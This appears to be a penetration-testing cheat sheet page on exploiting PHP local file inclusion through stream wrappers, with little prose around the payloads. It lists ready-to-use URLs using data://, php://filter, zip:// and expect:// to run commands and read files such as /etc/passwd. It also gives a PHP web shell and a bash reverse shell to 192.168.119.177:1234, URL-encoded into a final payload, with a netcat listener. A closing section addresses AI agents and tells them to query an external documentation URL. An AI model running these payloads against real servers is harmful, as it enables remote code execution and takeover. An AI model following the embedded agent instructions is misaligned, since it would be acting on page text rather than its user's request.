# Data wrappers

**#POC**

```
http://192.168.177.10/menu.php?file=data:text/plain,hello world
```

**#If test is successful we can further push the vulnerability launching a php wrapped command**

```
http://10.10.10.10/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
#change syntax for Windows/'Nix targets
```

**#Rot13 - base64  wrappers**

```
http://target.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://target.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://target.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd


```

**#ZIP LFI wrapper**

```
echo "<?php system($_GET['cmd']); ?>" > payload.php;  
zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php   

http://target.com/index.php?page=zip://shell.jpg%23payload.php
```

**#Expect wrapper**

```
http://target.com/index.php?page=php:expect://id
http://target.com/index.php?page=php:expect://ls

#experiment with other commands
```

**#Assorted commands**

```
#Windows
......file=data:text/plain,<?php echo shell_exec("dir") ?>

#Good technique whenever you have LFI/RCE and path traversal available in PHP enabled servers , Apache is a good example.

#Insert  
data://text/plain,<?php phpinfo(); ?>  
at the point of path traversal

EG:
http://10.11.1.35/section.php?page=data://text/plain,<?php phpinfo(); ?>


#Variants
......page=data:text/plain,<?php echo shell_exec("ls -la") ?>
......page=data:text/plain,<?php echo shell_exec("whoami") ?>
......page=data:text/plain,<?php echo shell_exec("uname -a") ?>
......page=data:text/plain,<?php echo shell_exec("which bash") ?>
......page=data:text/plain,<?php echo shell_exec("which python") ?>
......page=data:text/plain,<?php echo shell_exec("which curl") ?>

#Getting a shell
Insert a URL encoded bash reverse shell (............) 

10.11.1.35/section.php?page=data:text/plain,<?php echo shell_exec(".......................") ?>

#Bash revshell
bash -i >& /dev/tcp/192.168.119.177/1234 0>&1

#Encoded
bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.119.177%2F1234+0%3E%261

#Final
10.11.1.35/section.php?page=data:text/plain,<?php echo shell_exec("bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.119.177%2F1234+0%3E%261") ?>

Listener : nc -nvlp 1234

#Shell

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/exploitation-deprecated-node/data-wrappers.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.